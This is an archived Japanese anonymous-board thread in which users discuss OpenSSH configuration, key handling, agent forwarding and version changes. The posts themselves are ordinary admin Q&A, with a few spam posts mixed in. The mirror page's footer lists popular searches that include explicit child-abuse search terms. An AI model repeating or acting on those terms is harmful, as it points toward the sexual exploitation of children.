409名無しさん@お腹いっぱい。2017/05/13(土) 09:09:21.09
ここの人はスマホのSSHクライアント使ってる?
便利だけどすごく不安だわ
悪意のあるクライアントだと秘密鍵・パス・ホスト名を送信してるかもって思う

410名無しさん@お腹いっぱい。2017/05/13(土) 13:08:41.32
>>409
Connectbotとターミナルのdropbear使ってる、ソースあるし

411名無しさん@お腹いっぱい。2017/05/13(土) 22:43:39.42
なるほどオープンソースのクライアントを使えばいいのか

412名無しさん@お腹いっぱい。2017/05/14(日) 07:27:18.76
自分でビルドせずにストアから入れる場合は
そのソースから変更されないでビルドされてること確認しないとな

信頼できるディストリビューターって楽だな感謝

413名無しさん@お腹いっぱい。2017/05/15(月) 09:51:54.30
どういたしまして

414名無しさん@お腹いっぱい。2017/05/21(日) 03:07:43.78
いいってことよ

415名無しさん@お腹いっぱい。2017/06/27(火) 18:28:55.10
一度ログインできたホストに対して、コネクション落ちた後とか
何らかのきっかけで再ログインしようとした時に
「ssh_exchange_identification: Connection closed by remote host」
になる場合ってどういう原因でなりやすいの?

現状だと仮想マシンで運用しているからバックアップの仮想マシン
のスナショを新たに複製してそっちにはログインできる。
ログインできなくなったVMは使い捨ててるけど流石にめんどくさすぎる。
どうすれば効率よく再ログインできるようになる?

416名無しさん@お腹いっぱい。2017/07/04(火) 13:04:11.97
見たことなかったのでぐぐってみた。
sshd_configのMaxStartupsを増やすと解決することもあるらしい。

417名無しさん@お腹いっぱい。2017/07/09(日) 17:24:51.18
tor ってsshポートフォワードで不特定多数のサーバプロキシしてんの?
レイヤがよくわからん

418名無しさん@お腹いっぱい。2017/07/09(日) 23:38:21.08
>>417
sshスレにいるってことは公開鍵暗号を理解してる前提で説明すると
複数のtorノードをピックアップして各ノードの公開鍵で次のような入れ子の暗号データを作る
ノード1の公開鍵(ノード2の公開鍵(ノード3の公開鍵(オペレーション)))
ノード1が上のデータを受け取ると自分の秘密鍵で復号化してノード2に送る
ノード3まで来ると復号化した時にオペレーションが見えるので実行する
各ノードは最終ノード以外あといくつのレイヤがあるか分からない

419名無しさん@お腹いっぱい。2017/07/10(月) 01:56:21.15
>>418
うっわぁ・・・手が込んでるなこれ
接続結構遅くなるんじゃない?
鍵交換の猶予時間厳しくすればTorだけ弾けたりするのかな。
だめだ、最後のノードしか関係ないんだよな。
手動でしか鍵作ったことないけどssh-keygenとかそういう諸々は
自動化されてるのか?
転送先ってランダムなんでそ?

420名無しさん@お腹いっぱい。2017/07/10(月) 06:57:41.00
Torのスレでやった方がいいんじゃね

421名無しさん@お腹いっぱい。2017/07/15(土) 11:25:48.21
いまさら気づいたが
ESXi 6.0 入れたら
同梱の ssh が dropbear じゃなくて OpenSSH のものになっていた。

422名無しさん@お腹いっぱい。2017/08/15(火) 14:16:08.91
CentOS7の、OpenSSH6.6を使ってます

マシンにはLANインタフェースが3つあり、1つはインターネットへ、2つは内部用です

ここで、インターネット用のインタフェースだけ、SSHのポートを例えば2222に変更、それ以外は標準の22で利用したいと思ってます

sshd_configに、port 2222、ListenAddressにIPアドレス:22と書けば良いという情報を見つけたのですが
このListenAddressをカンマ区切りやスペース区切りなど色々と試しましたが複数の指定はできないらしく、
また0.0.0.0:22を指定するとインターネット用インタフェースでも22番をリッスンしてしまいます

結局、sshd_configは諦めて、iptablesによるフィルタリングとポートフォワードを併用して実装はしているのですが、
sshとiptablesの両方が設定に絡んでいて、分かりづらくなっているのを改めたいです

sshd_configで上記のような設定をすることは可能ですか?

423名無しさん@お腹いっぱい。2017/08/15(火) 15:46:01.85
ListenAddressは複数行かけるだろ

424名無しさん@お腹いっぱい。2017/08/15(火) 15:47:02.20
Linuxの話はLinux板で聞いてください

425名無しさん@お腹いっぱい。2017/08/15(火) 22:46:28.19
>>423
複数行で
ListenAddress インターネット:2222
ListenAddress 内部1:22
ListenAddress 内部2:22
と書いたところ、うまくいきました

ありがとうございました

426名無しさん@お腹いっぱい。2017/10/04(水) 21:46:58.61
OpenSSH 7.6
・ssh-1プロトコル完全に捨て
・arcfour,blowfish,CAST捨て
・1024ビット未満のRSA鍵は受け付けない
・CBC cipherはデフォルトで提供しない

古いssh鯖だと1024ビット未満制限とかCBCに引っかかるところあるんじゃないかな?

427名無しさん@お腹いっぱい。2017/10/04(水) 22:18:08.06
RSA鍵長のデフォルトが1024ビットのときなんてあったっけ?

428名無しさん@お腹いっぱい。2017/10/04(水) 22:19:06.74
間違い
1024未満のとき

429名無しさん@お腹いっぱい。2017/10/04(水) 23:20:01.18
CBC捨てるのはナゼ?
昔、実装の問題があったのは覚えてるけど、仕様自体に問題があるの?

430名無しさん@お腹いっぱい。2017/10/18(水) 17:08:22.12
CBC自体にはPadding Oracleを防ぐ・検出する仕組みがない

431名無しさん@お腹いっぱい。2017/10/31(火) 09:57:53.95
>>424
UnixもLinuxの親戚なんだからいいだろ

432名無しさん@お腹いっぱい。2017/10/31(火) 10:43:50.94
ダメです

433名無しさん@お腹いっぱい。2017/10/31(火) 10:49:45.97
LinuxはUNIXではないんだが

434名無しさん@お腹いっぱい。2017/10/31(火) 11:50:48.99
>>430
それはそうだけど、sshとしてcbc使った場合、
実装に問題がなければpadding oracle攻撃は不可能じゃない?

435名無しさん@お腹いっぱい。2017/10/31(火) 12:15:05.05
>>433
それ言いだすとFreeBSDとかも除外されてしまう

436名無しさん@お腹いっぱい。2017/12/16(土) 19:15:52.16

437名無しさん@お腹いっぱい。2017/12/22(金) 18:51:19.12
Agent Forwardingは
A->B->Cって繋げていくとき
AからBの鍵とBからCの鍵が同じじゃないと出来ないと思うんですけど
あってますか?

438名無しさん@お腹いっぱい。2017/12/22(金) 20:17:45.61
>>437
必要な鍵は「AからBの鍵」と、「AからCの鍵」
それらは別の鍵でいい

「BからCの鍵」は不要だよ

それらをすべて同じ鍵にすると、BにはAの秘密鍵も公開鍵も配置する必要があり
真に重要な鍵(Aの秘密鍵)を他人(B)に預けずに済むというAgent Forwardingのメリットが
なくなってしまっているのでは

439名無しさん@お腹いっぱい。2017/12/23(土) 04:08:25.92
ありがとうございます。
まとめるとB→Cの鍵がいらないかわりにA→Cの鍵とA→B使う
ことですね。

440名無しさん@お腹いっぱい。2017/12/29(金) 07:03:23.63
誰でも簡単にパソコン1台で稼げる方法など
参考までに、
⇒ 『宮本のゴウリエセレレ』 というブログで見ることができるらしいです。

グーグル検索⇒『宮本のゴウリエセレレ』

KMBRYP28K7

441名無しさん@お腹いっぱい。2018/02/05(月) 09:29:37.72
sshで接続されたとき、クライアント側のオプションによって
クライアントが、サーバに接続したときにポートフォワードの設定ができますよね

これをサーバ側からできませんか?
サーバが、クライアントから接続されたときにポートフォワードの設定をしたい

442名無しさん@お腹いっぱい。2018/02/06(火) 08:26:48.25
>>441
「サーバ側」の意味がよく分からないが、サーバ側でリスンしてクライアント側に繋ぐなら-Rでよいかと。
それとも繋いで来たクライアントにポートフォワードを強制させるサーバ側の設定があるかということ?
多分それは無理だと思う。

443名無しさん@お腹いっぱい。2018/02/08(木) 10:30:59.87
>>442
後者です

無理か・・・ まあ無理だよね。

444名無しさん@お腹いっぱい。2018/02/14(水) 09:20:46.82
☆ 私たち日本人の、を改正しましょう。現在、
衆議員と参議院の両院で、改憲議員が3分の2を超えております。

445名無しさん@お腹いっぱい。2018/04/09(月) 22:08:02.38
OpenSSH 7.7出たけど今回はあんま変わってないね。
yesと答えるところで yes hoge と入れると弾かれるとか
なんかどうでもいい修正も入ってる(expectとかの誤動作対策かな?)

446名無しさん@お腹いっぱい。2018/04/24(火) 21:58:54.21
sssssss

447名無しさん@お腹いっぱい。2018/04/25(水) 10:36:59.11
てすと

448名無しさん@お腹いっぱい。2018/04/25(水) 10:39:23.44
sshでログイン時に表示されるhow toのような物を表示させたくないので
その設定方法を教えて下さい
sshd_configで
PrintMotd no
Banner none
上記の設定でOSの起動時のメッセージは表示されなくなったけど
何種類かのhow toのような物がランダムな順序で表示される

449名無しさん@お腹いっぱい。2018/04/25(水) 10:40:35.07
追加です
●サーバー側
OS: FreeBSD 11.1
ssh: OpenSSH_7.2p2
●端末側
OS: Win7
sshクライアント: PuTTY

450名無しさん@お腹いっぱい。2018/04/25(水) 14:15:46.83
>>448
fortune のことかな。.login とかに
if ( -x /usr/bin/fortune ) /usr/bin/fortune freebsd-tips
とか書いてあるのを消せばいいのでは?

451名無しさん@お腹いっぱい。2018/04/25(水) 17:46:10.72
>>450
ありがとうございます

ssh用のログインユーザーの
~/.login
~/.profile
の2つのファイルに書かれていたので、コメントアウトしました
これで、すっきりしました

452名無しさん@お腹いっぱい。2018/04/28(土) 16:05:46.52
~/.hushloginをtouch

453名無しさん@お腹いっぱい。2018/05/22(火) 02:42:32.57
知り合いから教えてもらったパソコン一台でお金持ちになれるやり方
時間がある方はみてもいいかもしれません
グーグルで検索するといいかも『ネットで稼ぐ方法 モニアレフヌノ』

K9FUK

454名無しさん@お腹いっぱい。2018/08/26(日) 17:44:28.60
openssl-1.1.1-pre9 が出たので ライブラリだけ再コンパイルしたんだが
sshd って再コンパイルしてやらないと動いてくれないのな。
めんどくさい。
# `pwd`/sshd
OpenSSL version mismatch. Built against 10101008, you have 10101009

455名無しさん@お腹いっぱい。2018/10/13(土) 19:35:30.76
SSH その8YouTube動画>1本 ->画像>1枚

456名無しさん@お腹いっぱい。2018/10/28(日) 17:16:17.45
OpenSSH-7.9p1 って OpenSSL-1.1.x サポートするようになったのね。
パッチ当てなくてもconfigureも通るしコンパイルできる。

EVP_CipherInit_ex のパッチは必要でなくなったのかな?

457名無しさん@お腹いっぱい。2018/11/11(日) 19:15:52.32

458名無しさん@お腹いっぱい。2019/02/08(金) 20:47:38.70
ポートフォワード経由でWindowsファイル共有ってできるかな?
RDPはできてるんだが。

459名無しさん@お腹いっぱい。2019/03/29(金) 18:11:32.25
Solaris 11.4 の sshd (OpenSSH_7.5p1, OpenSSL 1.0.2o 27 Mar 2018) の設定なのですが

sshd_config に、

# Site local settings
Match Address *,!192.168.1.0/24
MaxAuthTries 0

のようにして指定のIPアドレス以外からの接続を拒否しています。
これに、あるドメイン(例: *hogehoge.com)からのアクセスも受け付けるようにしたいのですが
Match host *,!*.hogehoge.com
MaxAuthTries 0
のように記述を加えたらどこからもアクセスできなくなってしまいました。

Match Address と Match Host を「先の条件を満たし、かつ 後の条件を満たす」ではなく
「どちらかを満たせば接続を許可する」設定というのは、どうすればよいのでしょう?

Match address *,!192.168.0.0/24 and Mtach host *,!hogehoge.com
MaxAuthTries 0

なんて論理式書ければいいんですが そういうのは無いですよね?
ちなみに件の sshd には、tcp_wrappers はリンクされていません。

460名無しさん@お腹いっぱい。2019/03/29(金) 19:02:41.08
自己解決できてしまいました。
まずどうやってもうまくいかなかった理由
  UseDNS no
デフォルトでは DNS 逆引きをしてくれませんでした。マッチする筈がない。

次に * で拒絶して、! で除外してしまうと、そこで * にマッチして拒絶決定するので
最初に MaxAuthTries 0 でデフォルト拒否にして、Match Address と Match Host で
マッチするものを許可するようにしたところ、うまく動作するようになりました。

# Site local settings
UseDNS yes
MaxAuthTries 0
Match Address 192.168.1.0/24
MaxAuthTries 6
Match Host *.hogehoge.com
MaxAuthTries 6

461名無しさん@お腹いっぱい。2019/03/29(金) 19:37:31.06
ところで、IPアドレスで接続制限をするために MaxAuthTries を 0 にするっていうのは
Oracle Solaris のドキュメントを見て設定したんだけど

これだと Teraterm Pro のパスワード入力画面は出てしまうし、
(試行回数 0 なので正しいパスワードを入れても拒否される)
tcp_wrappers みたいに「接続してきた時点で認証前に接続を切断」
またはそれに近い、もっとスマートな方法はないですかね?

462名無しさん@お腹いっぱい。2019/03/29(金) 20:57:30.98
AuthenticationMethods none どないだ?

463名無しさん@お腹いっぱい。2019/03/30(土) 23:35:44.69
>>462
やってみるっす!

464名無しさん@お腹いっぱい。2019/03/31(日) 14:04:06.34
>>462
デフォルトを none、Match に match した場合に any になるようにしてみましたが、

none が適用される状況でも MaxAuthTries で指定した回数を超えるまでパスワード入力
できてしまいますね。もっとも、正しいパスワードを入力しても
  Permission denied, please try again.
が繰り返し表示されてログインできないのですが。

単純に disconnect ってディレクティブが使えればねー

465名無しさん@お腹いっぱい。2019/04/01(月) 00:02:41.38
sshのconfigは腐りすぎててどうしようもないと思うんだ

AuthenticationMethodsは認証通過可能なものを設定するだけで、個々の認証に挑戦するかどうかは
PubkeyAuthenticationやPasswordAuthenticationなどの*Authenticationで決まる
つまり全ての*Authenticationをnoにすることで認証に挑戦しなくなる

ただしデフォルトをnoにすると機能しなくなる認証タイプもあるという腐れっぷりなので注意が必要かも
そういう場合、デフォルトをyesにしておいて、最後の最後でMatch *でnoするとかの小細工がいる

466名無しさん@お腹いっぱい。2019/04/02(火) 22:23:11.87
>> sshのconfigは腐りすぎててどうしようもないと思うんだ

にもかかわらず、
Oracle Solaris にしろ debian にしろ、素の OpenSSH 実装に変えてきてるしねぇ

467名無しさん@お腹いっぱい。2019/05/05(日) 23:44:43.59
ウェルノウンでないポートをssh用に開いていて時々海外からアクセスがあるんだけど
今日の未明に日本のNTTアドバンステクノロジから来ていた
調査か何かしているのかな?連休の未明だから間違えて接続とかではなさそうだし

468名無しさん@お腹いっぱい。2019/05/07(火) 13:51:49.14
https://notice.go.jp/
これの関係かな

469名無しさん@お腹いっぱい。2019/05/08(水) 00:48:09.00
NICTのアドレスからじゃないのか
NTT-ATに発注したのかな

470名無しさん@お腹いっぱい。2019/05/10(金) 20:11:25.43
IoT機器調査及び利用者への注意喚起の取組「NOTICE」で使用するIPアドレスについて(2月14日更新)
https://www.nict.go.jp/info/topics/2019/02/13-2.html

471名無しさん@お腹いっぱい。2019/05/11(土) 14:13:04.81
>>470
入っていないな……
NTTアドバンステクノロジの独自調査なのか、踏み台と化しているIPがあるのか

472名無しさん@お腹いっぱい。2019/06/06(木) 01:11:49.25
Teraterm って複数相手のサーバーにSSHで接続する場合にも、
秘密鍵を1つしか使わないだろうと勝手に仮定して作られているようで、
そのため、実際にはつなぐ相手によって秘密鍵が違う場合には、
つなぐ相手のサーバー毎に、秘密鍵を指定しなおさなければならず、
とても不便だ。

接続先のサーバーと秘密鍵の組み合わせを登録できなきゃ不便だ。

Unixの上のSSHだったら、 .ssh の下に config ファイルを書いて、
どのホストに接続するのかによって、identity ファイルを切り替え
られるようになっているのにな。

473名無しさん@お腹いっぱい。2019/06/06(木) 03:30:56.56
宛先と鍵ファイルまでコマンドラインで指定したショートカットファイルを作ればいいんだと思う

474名無しさん@お腹いっぱい。2019/06/06(木) 10:36:01.85
tereterm menu

475名無しさん@お腹いっぱい。2019/07/06(土) 19:30:20.15
ホームディレクトリに生成される~/.sshディレクトリってどうしても移せないのかな。
できればホームディレクトリがすっきりしている方が嬉しいので~/.config/sshあたりに移したい。

476名無しさん@お腹いっぱい。2019/07/06(土) 20:44:38.73
そのおかしな感情を消す努力をした方が
後々のあなたの人生において
いろいろなことが優位に動くでしょう

477名無しさん@お腹いっぱい。2019/07/08(月) 10:47:25.14
なぜ返信したしw

478名無しさん@お腹いっぱい。2019/07/08(月) 22:08:03.15
AuthorizedKeysFile を ~/.config/.ssh/authorized_keys にすればお望み通りになるだろう
だが、それで何かがすっきりするとは思えん

479名無しさん@お腹いっぱい。2019/07/10(水) 01:49:41.06
pathnames.h の _PATH_SSH_USER_DIR を書き替えてコンパイルするしかないんじゃね

480名無しさん@お腹いっぱい。2019/07/10(水) 06:42:05.04
お前ら本当は『このすば』のアクアと結婚したいんだろ。素直になれよ

481名無しさん@お腹いっぱい。2019/07/14(日) 15:16:29.13
>>479
ありがとう!
でも再コンパイルか……やめときます。

482名無しさん@お腹いっぱい。2019/08/26(月) 23:04:30.22
>>480
めぐみんがいいです

scanner1.openportstats.com[89.248.168.62]という怪しい客人から隠し扉をノックされたw
ああいうのはいちいち大きな番号のポートまでスキャンして、開いているとSSHのログインを試行しているのかな

483名無しさん@お腹いっぱい。2019/08/27(火) 20:42:49.12
ポートスキャンすらされない1ケタ番台ポートを隠し扉にするって手もあるぞw


OpenSSH 8.0p1 を OpenSSL 1.1.1でコンパイルしてmake test全部通ったやしいる?
公式には非対応だけどビルドはできる。
ただ漏れマシンななんか怪しくてmake LTESTS=rekey t-exec がランダムに
通ったり通らなかったりする

484名無しさん@お腹いっぱい。2019/08/27(火) 23:08:54.16
$ ssh -V
OpenSSH_8.0p1, OpenSSL 1.1.1a-freebsd 20 Nov 2018

ちなみにsynスキャン、finスキャンは全部蹴ってる
pfのルールもsynproxy + antispoof

今のところ結構効果はあると、、思う

485名無しさん@お腹いっぱい。2019/08/29(木) 15:43:09.69
ports treeから

# make test

&#12316;&#12316;&#12316;&#12316;&#12316;&#12316;

all tests passed
1699.705u 100.260s 48:55.51 61.3% 305+337k 97+724io 25pf+0w

# /usr/local/bin/ssh -V
OpenSSH_8.0p1, OpenSSL 1.1.1c 28 May 2019

486名無しさん@お腹いっぱい。2019/10/14(月) 01:46:02.67
>>480
ゆんゆんでお願いします

487名無しさん@お腹いっぱい。2019/11/22(金) 12:37:21.98
OpenSSH U2F/FIDO support in base
https://undeadly.org/cgi?action=article;sid=20191115064850

yubicoとかと組み合わせられるようになるのかな。

488名無しさん@お腹いっぱい。2020/01/19(日) 19:16:24.13
ちょっとここでいいのか不明ですが質問させてください
Windows10のOpenSSHに接続して、遠隔でAutoItというスクリプトツールで作ったexeから
ホットキー操作を発生させようとしてるのですが、動作しません
SSHでログインできるフォルダ内でecho >> hogehoge.txtとか
あるいはそのAutoIt内でテキストを書くのは(startコマンドで)出来るのですが
ホットキーはだめでした
(SSH経由せずにstart /WAIT hogehoge.exeなら普通に動く)

こういうのはSSHでは不可能なんでしょうか?

489名無しさん@お腹いっぱい。2020/01/19(日) 22:31:34.39
自己解決、というかとりあえずテキストにコマンド書いてファイル監視でうまくいったので
これでいくことにしました、失礼しました

490名無しさん@お腹いっぱい。2020/03/11(水) 00:31:44.87
OpenSSH-8.2 からは、広く使われている HostKeyAlgorithms=ssh-rsa が
SHA1が危険だからという理由で取り除かれてしまうらしい。

ssh -oHostKeyAlgorithms=-ssh-rsa user@host で繋がらないホストは
将来繋がらなくなるよとリリースノートに書いてある。

手元ではdropbearのサーバがssh-rsaしかしゃべれてないな…
OpenSSHだけの世界ならあんま問題にならんのかもしれんかもだけど
影響は大きそう。

491名無しさん@お腹いっぱい。2020/03/26(木) 19:49:44.20
WANに存在する踏み台を経由して接続してきた相手の大元のipを調べることはできますか?
プロバイダの協力は無しという条件で

492名無しさん@お腹いっぱい。2020/03/26(木) 22:03:01.47
その踏み台の協力が無ければ出来ないでしょう

493名無しさん@お腹いっぱい。2020/04/07(火) 18:28:32.82
https://github.com/PowerShell/Win32-OpenSSH/releases
WIndows版のOpensshのことでちょっとお聞きしたいのですが、
クライアント側の設定でデフォルトのポート番号を変更する(22→65222)には
接続時に一々 -p 65222とやる以外に恒久的にしておく方法はありませんか?
Linuxなどでは/etc/ssh/ssh_configファイルにportを記述する場所がありますが、
上のgithubのreleaseにはsshd_configはあるものの、ssh_configが見当たらないのです。
UNIXと関係ない話題かもしれませんが、Windows板にもLinux板にもSSHスレが見当たらなかったので
質問させていただきました。どうも失礼しました。

494名無しさん@お腹いっぱい。2020/04/07(火) 21:15:10.64
Windows でもユーザーのホームディレクトリ下に .ssh ディレクトリを作って、その中に置けばいいのではないかと
C:\Users\(ユーザー名)\.ssh\ssh_config

495名無しさん@お腹いっぱい。2020/04/08(水) 07:52:29.78
>>494
ファイル名がssh_configではなくconfigならいけました。
ここらへんはLinux等と同じようです。
ただwin8.1タブだとpowershellの画面がバグってログインしても$プロンプトが表示されない
のですが、コマンドは普通に使えるようです。
とにかく、教えてくださってありがとうございました。

496名無しさん@お腹いっぱい。2020/04/11(土) 17:52:24.81
同じ鍵ペアでもサーバーが異なればホストキーのハッシュやVisualHostKeyは変わりますか?

497名無しさん@お腹いっぱい。2020/04/11(土) 18:19:19.56
同じ鍵ペアとは、sshサーバーが持っているホストキーの話ですか?
別のサーバーでもホストキーが同じならハッシュやVisualHostKeyも同じになります
https://cloud-news.sakura.ad.jp/2016/04/27/ssh-host-key/
こういうことが起きます

498名無しさん@お腹いっぱい。2020/04/11(土) 18:38:48.87
即レスありがとうございます
勘違いしていました
VisualHostKeyはサーバーのホストキーのイメージなんですね

ではssh-keygenで作成した公開鍵のfingerprintのrandomartは、
どういうときに使用されるのでしょうか
これを確認する方法はありますか?

499名無しさん@お腹いっぱい。2020/04/11(土) 18:40:23.01
秘密鍵と公開鍵のペアのfingerprintが正しいのかな

500名無しさん@お腹いっぱい。2020/04/11(土) 19:37:48.21
公開鍵のハッシュですから、公開鍵が間違ってないか確認するのに使えることになってますね
ユーザーが自分で作成した公開鍵を、サーバー管理者にメールで送って、フィンガープリントは別の方法(LINEとか)で送る
受け取ったサーバー管理者は、公開鍵のフィンガプリントを照合して「よしっ」と言う
こういうシナリオはよく紹介されていますが、実際にやっているかどうかは分かりません(私はやってません)

自分の経験としては、サーバーのauth.logにはログインしてくるユーザーの公開鍵のフィンガープリントが記録されているので
それと authorized_keys に登録されている公開鍵のフィンガープリントを比べて、登録されているかどうか調べたことくらいです

501名無しさん@お腹いっぱい。2020/04/12(日) 00:33:22.79
自分の公開鍵のrandomartを表示させる方法はありますか?
鍵生成時以外表示させる方法が分かりません

502名無しさん@お腹いっぱい。2020/04/12(日) 00:41:49.10
ちょっと便乗
サーバーのホストキーのハッシュっていうけど、クライアントの公開キーを変えると返ってくるホストキーのハッシュ変わらない?

503名無しさん@お腹いっぱい。2020/04/13(月) 02:47:31.78
>>501
ssh-keygen で
-l でフィンガプリント表示 -v もつければ visual

504名無しさん@お腹いっぱい。2020/04/13(月) 02:48:15.53
>>502
そうなの?
今度試してみよう

505名無しさん@お腹いっぱい。2020/04/13(月) 17:15:59.47
>>502
公開鍵(と秘密鍵のペア)を新しく作ってみたけど、サーバー側のホストキーのフィンガープリントは変わらなかったぞ
別のクライアントから、異なるユーザーで、公開鍵認証を使わずに接続したときも、サーバー側ホストキーのフィンガープリントは同じだった

506名無しさん@お腹いっぱい。2020/04/27(月) 12:30:21.25
VPN+RDPと比較してSSH+RDPのほうが余計なトラフィックがないぶん速いと考えていいですか?

507名無しさん@お腹いっぱい。2020/04/27(月) 22:37:15.55
一概に余計とはいえないが、ブロードキャストもバカにならないからね
VPNとSSHを比べるなら、SSHの方が速くなるよ

でもSSH+RDPってことは、PCにCygwinでも入れてSSHトンネルを掘る、なんていうことを
やろうとしてるのかな
その場合SSHの暗号化・復号をPCでやることになるから、その処理リソースを考慮すると
どうなるだろうね

VPNならルータにその辺の処理をお任せできてPCはRDPに専念できるから、
RDPの操作感はVPNの方がよくなるかもしれない

508名無しさん@お腹いっぱい。2020/04/28(火) 14:52:55.21
windows 10 にいつのまにか openssh が入ってた
cygwinつかわなくてもsshトンネルできるな

509名無しさん@お腹いっぱい。2020/04/28(火) 18:33:27.23
3年前くらいからあったよ

510名無しさん@お腹いっぱい。2020/05/07(木) 07:54:47.76
卑怯なOS

511名無しさん@お腹いっぱい。2020/05/08(金) 10:09:38.31
ほんとソース読まない書かない無能は文句ばかりいう。

512名無しさん@お腹いっぱい。2020/05/09(土) 00:34:56.82
初心者で1からsshを学びたいです
何かおすすめの書籍等はありますでしょうか?

513名無しさん@お腹いっぱい。2020/05/09(土) 02:28:47.16
man ssh

514名無しさん@お腹いっぱい。2020/05/09(土) 10:00:38.01
ほんとなんでこういう奴はman見ないのかな
「わかるSSH」とかないとわからないわけ?

515名無しさん@お腹いっぱい。2020/05/09(土) 10:34:17.03
>>514
そうか。お前の態度は気にくわないが
まずはman読むわ

516名無しさん@お腹いっぱい。2020/05/09(土) 10:51:33.99
manって書いたやつのセンスないからわかりにくいんだよね

517名無しさん@お腹いっぱい。2020/05/09(土) 11:44:29.74
manコマンドはセクハラです!!

518名無しさん@お腹いっぱい。2020/05/09(土) 12:36:24.76
manの内容って分からない人が読むこと想定されてないよね。

519名無しさん@お腹いっぱい。2020/05/09(土) 15:56:58.50
man man
から始めろよ

520名無しさん@お腹いっぱい。2020/05/09(土) 16:24:47.43
manはあくまでその実装の解説だからね
SSHそのものに関して知るならやはりRFCだろうね。つか、こんなにあったのか

RFC4250 The Secure Shell (SSH) Protocol Assigned Numbers
RFC4251 The Secure Shell (SSH) Protocol Architecture
RFC4252 The Secure Shell (SSH) Authentication Protocol
RFC4253 The Secure Shell (SSH) Transport Layer Protocol
RFC4254 The Secure Shell (SSH) Connection Protocol
RFC4255 Using DNS to Securely Publish Secure Shell (SSH) Key Fingerprints
RFC4256 Generic Message Exchange Authentication for the Secure Shell Protocol (SSH)

521名無しさん@お腹いっぱい。2020/05/09(土) 16:54:16.53
日経Linuxのシス管系女子にssh回もあったんじゃないかな

522名無しさん@お腹いっぱい。2020/05/10(日) 16:32:25.30
SSHの何を知りたいんだろ

523名無しさん@お腹いっぱい。2020/05/21(木) 13:26:55.64
初心者です。公開鍵、秘密鍵でのsshにつて質問です

ssh-keygenしてssh-copy-idで接続できました。
そして、同じリモートから違うサーバーにsshしたい場合は
上で作ったssh-keygenを使い回すのですか?
それともまたssh-keygenで作るのですか?

524名無しさん@お腹いっぱい。2020/05/21(木) 15:16:18.18
>上で作ったssh-keygenを使い回すのですか?
を「ssh-keygenで作った公開鍵、秘密鍵を使いまわすのですか?」と解釈して
私は使いまわしてます


lud20200521153841
このスレへの固定リンク: http://5chb.net/r/unix/1398419457/
ヒント:5chスレのurlに http://xxxx.5chb.net/xxxx のようにbを入れるだけでここでスレ保存、閲覧できます。

TOPへ TOPへ  

このエントリをはてなブックマークに追加現在登録者数177 ブックマークへ


全掲示板一覧 この掲示板へ 人気スレ | Youtube 動画 >50 >100 >200 >300 >500 >1000枚 新着画像

 ↓「SSH その8YouTube動画>1本 ->画像>1枚 」を見た人も見ています:
zsh その7
SkyFish その8
【NSK】日本精工 その8
市光工業総合スレ その8
ニンテンドー3DS その1298
ニンテンドー3DS その1348
ニンテンドー3DS その1338
★Paint Shop Pro★ その8
YES 八幡 NO HACHIMAN その8
那須川天心vsその辺の180cmのドカタ
UNIX板の人が行くよその板は?
*BSDニュース@2ch その7
KBS京都 地デジ5ch その8
そもそもPS4の8000万台が大嘘なのでは?
【DENSO】デンソー期間工その18
西宮市民が集うスレッドその18
Elona初心者質問スレッド その118
ゴールドジムノース東京 その28
愛媛県松山市総合スレッド その18
【HONDA】ゼスト その8【ZEST】
くだすれPython(超初心者用) その38
愛媛県松山市総合スレッド その68
愛媛県松山市総合スレッド その80
WordPress(ワードプレス)その28
ドライブ行くならやっぱ一人だよな その185
ニンテンドー3DS/2DS総合 その1368
ドライブ行くならやっぱ一人だよな その158
ドライブ行くならやっぱ一人だよな その148
ドライブ行くならやっぱ一人だよな その118
ニンテンドー3DS/2DS総合 その1358
ドライブ行くならやっぱ一人だよな その128 ->動画>2本->画像>182枚
愛媛県松山市総合スレッド その38
HKT48のうどんが良心的な値段で美味しそう
ゴールドジムノース東京 その18
ドライブ行くならやっぱ一人だよな その178
ドライブ行くならやっぱ一人だよな その180
ELSWORD エルソード晒しスレその138
ELSWORD エルソード晒しスレ その158
The Elder Scrolls V: SKYRIM その584
The Elder Scrolls V: SKYRIM その468
The Elder Scrolls V: SKYRIM その585
The Elder Scrolls V: SKYRIM その568
The Elder Scrolls V: SKYRIM その581
ELSWORD エルソード晒しスレ その148
ELSWORD エルソード晒しスレ その158
The Elder Scrolls V: SKYRIM その578
The Elder Scrolls V: SKYRIM その583
The Elder Scrolls V: SKYRIM その458
The Elder Scrolls V: SKYRIM その587
The Elder Scrolls V: SKYRIM その484
The Elder Scrolls V: SKYRIM その588
RAID: Shadow Legends その8
The Elder Scrolls V: SKYRIM その548
キャンピングカー総合スレッド その8
The Elder Scrolls V: SKYRIM その485
【Winny】声優総合スレ その78【Share】
The Elder Scrolls V: SKYRIM その518
The Elder Scrolls V: SKYRIM その486
The Elder Scrolls V: SKYRIM その482
The Elder Scrolls V: SKYRIM その483
ドライブ行くならやっぱ一人だよな その181
ドライブ行くならやっぱ一人だよな その186
ドライブ行くならやっぱ一人だよな その138
【警視庁】首都を守るプライド その28【警察官】
初心者質問スレ その118 &#169;2ch.net

人気検索: 繧ェ繝ェ繧キ繝シ pedo little girls Child porn Preteen 辭溷・ウ繧ェ繝翫ル繝シ 姫川優花 ロリあうロリ 繧サ繝輔Ο繝ェ 電影少女 二次 着換え
05:07:51 up 16 days, 2:16, 3 users, load average: 89.52, 120.80, 138.43

in 0.029809951782227 sec @0.029809951782227@0b7 on 092818